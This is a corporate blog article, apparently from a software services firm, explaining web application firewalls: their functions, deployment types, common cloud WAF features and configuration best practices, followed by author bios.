Web apps are used daily across different industries around the world – from banking solutions through collaboration tools to entertainment platforms. Their prevalence makes them a prime target for attackers who want to gain access to sensitive user information and infiltrate company databases. Fortunately, engineers have tools like Web Application Firewalls (WAFs) at their disposal to protect solutions from malicious activity. Read on to learn more about different types and functionalities of WAFs, as well as best practices for implementing and using these cybersecurity components.
What is a WAF and what does it do?
A WAF is a cybersecurity measure that filters and monitors Hypertext Transfer Protocol (HTTP) traffic to protect web applications from different attacks on the Open Systems Interconnection (OSI) layer 7. It ensures that only valid requests reach an application and blocks dangerous attempts at breaching servers.
Read more: Cybersecurity strategies
Implementing a WAF in a project offers a range of security advantages. With its active monitoring and customizable rules, a WAF helps further eliminate key vulnerabilities in your project. It also keeps an application’s endpoints safe by blocking typical SQL injection and cross-site scripting (XSS) attacks that could result in data breaches. This control over incoming and outgoing traffic enables you to manage an application’s workloads, which improves application performance. Additionally, a WAF also facilitates cybersecurity management at the level of security rules, thereby giving you precise tools to filter out unwanted requests and communication.
Though the specific mechanisms may differ between the solutions available on the market, in general, the main functions of a WAF include:
- traffic filtering and real-time monitoring;
When using a WAF, you get access to a variety of tools to precisely filter traffic on your web app. Some common mechanisms include whitelisting and blacklisting. Setting up a whitelist means you block all the traffic and allow only data that meets your requirements (for example, IP addresses). A blacklist, on the other hand, removes selected kinds of traffic, while letting in everything else. A WAF also enables you to monitor network traffic in real time (or in almost real time) so that you can react to any incidents as soon as possible. Moreover, a WAF generates reports about the traffic it detected so you can analyze it and identify anomalies, potential issues and suspicious activity.
- protection against code injection;
A WAF helps prevent attacks that aim to interfere with the application code e.g., by injecting script fragments or code to target end users (XSS attacks), creating false class instances in a deserialization process and inserting code into SQL queries (SQL injection). These attacks usually aim to run commands on the server and gain access to more and more sensitive data, which can be destroyed or stolen. A recent, well-known example of this exploit is the zero-day Log4Shell vulnerability, where attackers could take advantage of Log4j, a logging framework, to remotely execute their own Java code on servers or devices, affecting such companies as Google or Microsoft. However, systems that already had a WAF installed could be easily protected by updating a WAF’s ingress and egress rules to include this vulnerability.
- intrusion detection and prevention;
By implementing a WAF, you can protect your web application from bots and similar tools that precisely scan them to identify potential vulnerabilities. These malicious tools make a detailed inventory of an application’s resources and services, which will help attackers prepare a full-blown attack. A WAF can alert you to this suspicious activity or report the increased traffic, which enables you to block these bots or take a different action to protect your app.
- protection of back-end systems;
The different filtering mechanisms provided by a WAF ensure that only valid traffic reaches your back-end systems. They prevent distributed denial-of-service (DDoS) attacks and stop unnecessary or malicious requests from overloading the system, especially in the case of flood attacks. As a result, your web application is not only safe, but it also performs better and faster.
- regulatory compliance.
Data security is becoming a significant concern for many consumers, but it’s also an important area of software development that companies need to pay special attention to if they want to meet regulations in their industry. Installing a WAF can help your web software comply with security standards like HIPAA, GDPR or SOC 2.
Types of Web Application Firewalls
There are three main types of WAFs, determined by how they’re deployed. All of them serve the basic functions mentioned earlier, however, companies may decide on different WAF solutions to meet their specific product needs, budget limits and regulatory requirements.
1. Network-based WAFs
Examples: mod_security (Apache), Snort, HAProxy Enterprise.
A network-based (or software-based) WAF is installed between a web server and an Internet browser. It analyzes the incoming and outgoing traffic and filters requests and signatures, based on established rules. This type of WAF is relatively cost-effective and offers a lot of flexibility in terms of different servers it can be deployed for, but its filtering and monitoring processes may be slower, compared to other WAFs.
2. Hardware-based WAFs
Examples: F5, Fortinet, Imperva SecureSphere, Barracuda Web Application Firewall.
A hardware-based WAF is deployed on a dedicated physical device and installed within a local network. All traffic is directed to this piece of hardware, which contains all the necessary filtering and monitoring components. This WAF type offers significantly higher performance and better speed, however, it can be more expensive than other WAFs to purchase and maintain.
3. Cloud-based WAFs
Examples: Microsoft Azure, Google Cloud Platform (GCP) and Amazon Web Services (AWS).
This type of WAF is a software component within a cloud infrastructure, usually offered by a cloud service provider as part of their Software as a Service (SaaS) solutions. It performs well, easily scales up and supports different integrations, helping you improve the cybersecurity of your projects e.g., based on Kubernetes.
4. Behavior-based WAFs
Examples: ThreatX Protection, Fastly Next-Gen WAF.
A subtype of cloud WAFs, behavior-based WAFs implement machine learning (ML) to enhance their filtering capabilities. Through advanced pattern analysis and recognition, they can easily detect traffic anomalies, zero-day attacks and malicious attempts at bypassing the WAF – even if they’re not explicitly stated in the applied rules. They also expand their pattern databases by examining real traffic, which decreases the number of false positives. This refined analysis enables this type of WAF to automatically generate relevant rules to further elevate its security levels.
Typical functionalities of leading cloud-based WAFs
The WAFs available on different platforms offer similar safety capabilities. The specific WAF solution you’ll choose will be ultimately determined by the platform where you deploy your applications. The key takeaway here, then, is that you’re familiar with the different mechanisms that WAFs offer and implement them to improve the security of your projects. This section highlights functionalities you can find in frequently used cloud-based WAF solutions provided by such providers as Microsoft Azure, GCP and AWS.
Cloud-based WAFs enable you to:
- filter traffic (based on different conditions e.g., countries, regions, IP addresses, regex sets, other custom metrics) and implement web access control lists (webACLs),
- apply the OWASP Core Rule Set (CRS),
- block XSS and SQL injection attacks,
- protect your app from HTTP request smuggling, HTTP response splitting and remote file inclusion,
- detect HTTP anomalies and incorrect parameters that don’t comply with the RFC2616 protocol,
- keep your app safe from bots, crawlers and scanners (such as Shodan, ZoomEye and Censys),
- analyze the contents of an app’s body to prevent XML external entity (XXE) injection attacks,
- stop attackers from using intercepted accounts to cause further security breaches – specifically, the AWS WAF’s Fraud Control feature includes account takeover prevention (ATP) and account creation fraud prevention (ACFP) mechanisms and creates a database of stolen logins and passwords to avert attacks,
- analyze traffic patterns and automatically generate new filtering rules (e.g., Google Cloud Armor Adaptive Protection),
- detect typical mistakes in app configurations e.g., in Apache and Internet Information Services (IIS) apps,
- identify and limit vulnerabilities in Log4j,
- protect an app’s databases (e.g., Microsoft Defender).
Best practices for implementing and using a WAF
Understanding how a WAF works and what advantages it offers is the first step to building safe apps. To get the most out of this measure, it’s also important to set up and configure it in an optimal way, then maintain it to head off new threats.
For example, when implementing a WAF, remember to use a preview mode. It will help you avoid errors and ensure that the WAF functions as expected before it’s deployed. Another recommendation when setting up your WAF is to create dedicated rules for applications that handle specific kinds of traffic (e.g., rules for headers, body, etc.). This way, you can account for attacks and incidents characteristic to selected elements of an app. It’s also a good idea to switch on rules focused on protecting different types of vulnerabilities (such XSS attacks and injections).
Rate-bused rules are another good choice when configuring your WAF. By tracking and limiting the rate of requests sent from an IP address, you can block excessive traffic. You should also use detailed request logs. In case of an incident or suspicious activity, these records can be analyzed to understand what happened and to identify vulnerabilities in an app. To easily manage all these different rulesets, Infrastructure as Code (IaC) tools like Terraform are highly recommended. They make it easier for you to create, roll back, transfer or configure any rules. To verify rules, you can also use external scanning solutions (e.g., Qualys or Tenable). Additionally, make sure to activate a dedicated DDoS protection mechanism – depending on the platform you use: AWS Shield, Azure Front Door, Google Cloud Armor.
To maximize the security of data exchanged between your application and an online browser, encrypt traffic after it’s been analyzed by a WAF by connecting the backend session to Transport Layer Security (TLS). Applying TLS to backend communication may be an expensive solution, but it ensures that all information remains private and encrypted, which is particularly important in the case of sensitive data.
Finally, regularly review and update WAF rules. Some settings may need to be changed or added to accommodate new features. Moreover, attackers are constantly refining their methods and coming up with new techniques – that’s why your security mechanisms also need to be up to date at all times.
Cybersecurity is essential to high-quality cloud software development
WAF components are excellent tools for protecting web solutions from various kinds of attacks that can result in sensitive data leaks, reputational damage and loss of customer trust. However, just like with similar mechanisms, you shouldn’t rely only on a few security tools. A WAF works best if it’s an element of a layered cybersecurity solution when building cloud-based apps, from a safe architecture to long-term best practices.
A cross-functional development team can ensure that your solutions are built with strong safeguards, satisfying user experience and high performance in mind from the very beginning. Organizations often team up with software engineering partners like Software Mind to speed up software delivery and drive innovation, while enhancing security. Fill out the form below to find out how our experts improve product quality, accelerate digital transformations and mitigate cyberthreats.
About the authorJan Jurek
Senior Software Architect
A Senior Software Architect and Team Manager with almost 15 years’ experience, Jan has developed and managed projects using a wide array of tools and technologies, especially Java. Passionate about enhancing products and services for his clients, Jan leverages his engineering background and security expertise to ensure safe and swift software delivery. When not exploring the exciting possibilities of Kubernetes, AWS and Web Application Security, he can be found giving lectures to students at various Polish universities.
About the authorMateusz Żelazko
Principal Software Engineer
A Principal Software Engineer, Mateusz has over 10 years’ experience in designing and implementing Java and microservice-based systems for businesses in the telecommunications and manufacturing industries. As an active contributor to the Security Guild, his professional interests revolve around the security of web applications, system optimizations and finding solutions to performance issues.
About the authorTomasz Kuc
Senior System Engineer
A Senior System Engineer with many years' experience in IT, Tomasz has implemented a range of systems and worked on diverse IT projects, in recent years mainly for mobile operators. He has a keen interest in security, especially as regards analyzing malware and researching different kinds of cyber risks.